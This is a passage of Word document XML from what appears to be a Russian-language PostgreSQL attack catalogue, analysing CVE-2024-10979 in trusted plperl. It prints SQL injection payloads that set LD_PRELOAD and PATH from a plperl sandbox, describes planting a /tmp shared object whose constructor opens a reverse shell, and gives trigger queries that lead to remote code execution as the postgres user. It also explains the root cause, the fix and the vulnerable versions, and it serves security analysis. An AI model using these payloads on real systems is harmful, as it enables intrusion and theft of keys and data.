        </w:rPr>
        <w:t>Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429E0773" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT execute_report(1); CREATE OR REPLACE FUNCTION pg_temp.preload() RETURNS void</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43909F91" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LANGUAGE plperl AS $perl$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4660E2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  $ENV{'LD_PRELOAD'} = '/tmp/x.so';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFF8476" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$perl$;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41896BD9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT pg_temp.preload(); --)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFB3A86" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Функция создаётся в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_temp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (без CREATE на основной схеме — temp-схема всегда доступна), исполняется. Sandbox </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>до фикса</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не блокирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$ENV{...} = ...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. После выполнения </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LD_PRELOAD</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> установлен в env backend-процесса этой сессии.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74010696" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload B — PATH-hijack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66669583" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1); CREATE OR REPLACE FUNCTION pg_temp.hijack() RETURNS void LANGUAGE plperl AS $perl$ $ENV{'PATH'} = '/tmp:' . $ENV{'PATH'}; $perl$; SELECT pg_temp.hijack(); --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0882A786" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">То же самое, но меняется </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$PATH</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/tmp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> идёт первым, любой бинарь, вызванный по имени (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), сначала будет искаться в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/tmp</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1761667F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Pre-condition — доставка вредоносного файла</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA5CD10" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">И LD_PRELOAD, и PATH-hijack требуют, чтобы атакующий заранее положил файл в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/tmp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на хосте PostgreSQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B897C3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/tmp/x.so</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — shared object с конструктор-функцией </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>__attribute__((constructor))</w:t>
      </w:r>
      <w:r>
        <w:t>, делающей reverse-shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A2C91E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/tmp/ps</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (или другой ожидаемый бинарь) — shell-скрипт с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#!/bin/bash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450A3CFE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Возможные пути доставки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D2C5D9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.6.4 `lo_export`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (если у атакующего есть </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_write_server_files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — отдельная привилегия)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FCED0D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   file-upload в другом сервисе на том же хосте, который пишет в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/tmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461ECFAF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   скомпрометированный CI-runner, выгрузивший артефакты в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/tmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27123CC0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   физический доступ / shared dev-environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B152DE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Без доставки файла CVE-2024-10979 даёт только модификацию env</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, без активного RCE. RCE случается, когда backend следующим действием спавнит подпроцесс, который читает изменённый env: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dlopen()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> при LD_PRELOAD, любой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>popen("name")</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без полного пути при PATH-hijack. Spawning может прийти из той же сессии (если есть COPY PROGRAM, dblink, postgres_fdw) или из соседнего backend через shared env-cleanup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC4BC35" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Trigger — активация preload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38750184" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">После установки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LD_PRELOAD</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и наличия </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/tmp/x.so</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC801A0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F3627E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- любой следующий запрос, форкающий backend подпроцесс,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E164FEC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- загрузит /tmp/x.so и исполнит конструктор</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0904C38A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В большинстве реалистичных эксплойт-цепочек после CVE-2024-10979 идёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`COPY (SELECT '') TO PROGRAM 'true'`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или вызов </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dblink_connect()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — оба спавнят подпроцесс, который наследует env. Это превращает CVE-2024-10979 в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>усилитель</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для существующих векторов: даёт RCE до того, как у атакующего есть </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_execute_server_program</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (см. 3.13 — пути его получить).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CE3E75" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> При успешном trigger — конструктор </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/tmp/x.so</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> исполняется в адресном пространстве подпроцесса (для LD_PRELOAD) или подменённый бинарь исполняется как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (для PATH-hijack). Эффект — RCE как пользователь </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, дальше идентично 3.7.1 / 3.7.2a (доступ к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$PGDATA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, SSH-ключам, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_hba.conf</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013EC043" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Почему это работает.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> trusted </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plperl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> использует Perl-модуль </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Safe.pm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для ограничения доступного API внутри sandbox. До CVE-2024-10979 список запрещённых operations не включал записи в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%ENV</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Perl-операция </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$ENV{key} = value</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не падала с ошибкой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>safe mode violation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Фикс — добавление проверки на доступ к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%ENV</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в trusted-режиме (commit в PostgreSQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>src/pl/plperl/plperl.c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). После фикса </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$ENV{'X'} = 'Y'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> внутри plperl даёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ERROR: 'Safe' trapped operation</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F626ED4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Корневая причина — общая для CVE-уровня в trusted-языках: Safe.pm не покрывает все векторы env-mutation в Perl (та же проблема была в Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>restricted execution</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, deprecated в Python 3 целиком). PostgreSQL не контролирует, что именно </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Safe.pm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> блокирует — полагается на белый список Perl-операций.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E42A676" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF8F44E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версия PG (уязвима):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ≤ 17.0, 16.4, 15.8, 14.13, 13.16, 12.20. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Фикс:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 17.1, 16.5, 15.9, 14.14, 13.17, 12.21 (выпущены 14 ноября 2024 г.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C11C58" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегия:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156924CD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>USAGE</w:t>
      </w:r>
